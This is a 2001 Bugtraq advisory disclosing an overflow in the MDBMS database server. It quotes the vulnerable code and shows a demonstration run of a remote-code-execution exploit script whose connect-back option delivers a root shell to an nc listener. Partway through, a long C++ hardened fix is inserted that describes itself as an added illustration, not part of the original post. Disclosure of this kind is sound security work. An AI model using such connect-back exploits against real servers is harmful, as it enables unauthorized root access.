[21003] in bugtraq
Remote buffer overflow in MDBMS.
daemon@ATHENA.MIT.EDU (teleh0r -)
Wed Jun 13 18:00:55 2001
From: teleh0r - <teleh0r@digit-labs.org>
To: BUGTRAQ@securityfocus.com
Date: Tue, 12 Jun 2001 21:47:37 +0200
Message-Id: <01061221473700.15610@localhost.localdomain>
Dear bugtraq readers,
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below contain an exploitable
buffer overflow in the handling of the \s console command.
When a user passes large buffers to the server in the form
of multiple lines, these are appended to the end of each
other. A subsequent call to the \s command causes the
overflow.
Below is the faulty code (from interface.cc):
void user::uprintf(char *s, ...)
{
    char b[10000];                  /* fixed-size stack buffer */
    int len=strlen(outbuf), newlen;
    va_list ap;

    va_start(ap,s);
    vsprintf(b,s,ap);               /* <---- no length limit: formatted output longer than 10000 bytes runs past b */
    va_end(ap);
    newlen=strlen(b);
    /* the heap-side output queue is grown as needed; only the stack buffer b is unbounded */
    while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
    strcat(outbuf,b);
    FD_SET(fd,&parent->wmask);
}
mu-b also found a buffer overflow in the "create database"
system. This was actually caused by a sprintf that generated
the name of the management variable. This has been fixed -
now table and database names can no longer be larger than
128 bytes.
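The two defects above (the unbounded vsprintf into a 10000-byte stack buffer in uprintf, and the unchecked length of table and database names) have a common fix: measure before you write and refuse input that does not fit. The following is an added illustration of that fix, not code from MDBMS or its author; the class name `user` and the members `outbuf`/`outsize` mirror the fragment quoted above, while `outlen`, `reserve`, `valid_object_name` and the sample inputs are constructed for this example.

```cpp
// Hardened counterpart of the quoted user::uprintf (added example, not MDBMS code).
// Assumptions: the class is named `user` with members outbuf/outsize as in the
// advisory; everything else here is constructed for the demonstration.
#include <cstdarg>
#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <new>
#include <stdexcept>
#include <string>

class user {
public:
    user() : outbuf(static_cast<char*>(std::malloc(1000))), outsize(1000), outlen(0) {
        if (!outbuf) throw std::bad_alloc();
        outbuf[0] = '\0';
    }
    ~user() { std::free(outbuf); }
    user(const user&) = delete;
    user& operator=(const user&) = delete;

    // Formats straight into the growable output queue: no fixed stack buffer,
    // so a multi-line input that concatenates to >10000 bytes cannot overrun.
    // Returns the total number of bytes now queued.
    size_t uprintf(const char* s, ...) {
        va_list ap, ap2;
        va_start(ap, s);
        va_copy(ap2, ap);                                   // second pass needs its own list
        int needed = std::vsnprintf(nullptr, 0, s, ap);     // measure first
        va_end(ap);
        if (needed < 0) { va_end(ap2); throw std::runtime_error("vsnprintf failed"); }
        reserve(outlen + static_cast<size_t>(needed) + 1);  // +1 for the NUL
        std::vsnprintf(outbuf + outlen, outsize - outlen, s, ap2);
        va_end(ap2);
        outlen += static_cast<size_t>(needed);
        return outlen;
    }

    size_t queued() const { return outlen; }
    const char* data() const { return outbuf; }

private:
    // Grows the queue geometrically and checks realloc, which the original
    // did not (a failed realloc there would have lost the buffer pointer).
    void reserve(size_t want) {
        if (want <= outsize) return;
        size_t nsize = outsize;
        while (nsize < want) {
            if (nsize > SIZE_MAX / 2) throw std::bad_alloc();
            nsize *= 2;
        }
        char* nbuf = static_cast<char*>(std::realloc(outbuf, nsize));
        if (!nbuf) throw std::bad_alloc();
        outbuf = nbuf;
        outsize = nsize;
    }
    char* outbuf;
    size_t outsize;
    size_t outlen;
};

// Mirrors the fix described for "create database": names are capped at
// 128 bytes, so a sprintf building the management variable name cannot overflow.
bool valid_object_name(const std::string& name) {
    return !name.empty() && name.size() <= 128;
}

// Constructed sample: appends twice the size of the original stack buffer.
size_t demo_large_append() {
    user u;
    std::string big(20000, 'A');
    u.uprintf("%s\n", big.c_str());      // 20001 bytes queued
    return u.uprintf("%d rows\n", 42);   // 20001 + 8 = 20009
}

// Checks that the queued bytes are exactly what was formatted, NUL-terminated.
bool demo_consistent() {
    user u;
    std::string big(20000, 'A');
    u.uprintf("%s\n", big.c_str());
    u.uprintf("%d rows\n", 42);
    return std::strlen(u.data()) == u.queued()
        && u.data()[0] == 'A' && u.data()[20000] == '\n';
}

int main() {
    std::printf("queued after large append: %zu\n", demo_large_append());
    std::printf("content consistent: %s\n", demo_consistent() ? "yes" : "no");
    std::printf("129-byte name accepted: %s\n",
                valid_object_name(std::string(129, 'x')) ? "yes" : "no");
    return 0;
}
```

The measuring call `vsnprintf(nullptr, 0, ...)` is the key difference from the original: the size of the formatted text is known before any byte is written, so the destination is sized to the input rather than the input being trusted to fit a fixed array.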
Information about the overflows was sent to marty@hinttech.com.
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
We would like to thank Marty for his kind response and quick update.
Exploit example:
----------------
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
Usage: ./mdbms-pms.pl -t <hostname> -b <back>
-t <hostname> : hostname to test
-b <back> : connect back to ip
-p <port> : port (default: 2223)
-d <delay> : delay before timeout
-o <offset> : offset
-h : return to heap
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return : 0x80cfe76 / using the heap ...
-> Sending payload: ...
-> * Successfully sent payload - good luck!
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
Exploit code attached.
Sincerely yours,
teleh0r and mu-b
--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
Attachment: mdbms.tar.gz (application/x-gzip)